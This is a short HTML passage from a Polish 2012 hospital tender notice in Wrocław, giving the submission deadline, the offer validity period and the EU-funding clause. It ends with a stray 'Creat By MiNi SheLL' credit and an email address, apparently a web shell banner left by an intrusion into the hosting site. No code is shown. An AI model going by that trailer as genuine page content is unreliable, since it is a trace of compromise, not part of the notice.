<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny im. A. Falkiewicza we Wrocławiu
52-114 Wrocław, ul. Warszawska 2
Dział Administracji i Zamówień Publicznych lub poprzez w/w. stronę internetową..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2012 godzina 10:30, miejsce: sekretariat Zamawiającego we Wrocławiu, ul. Warszawska 2, (parter, pok. nr 2)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com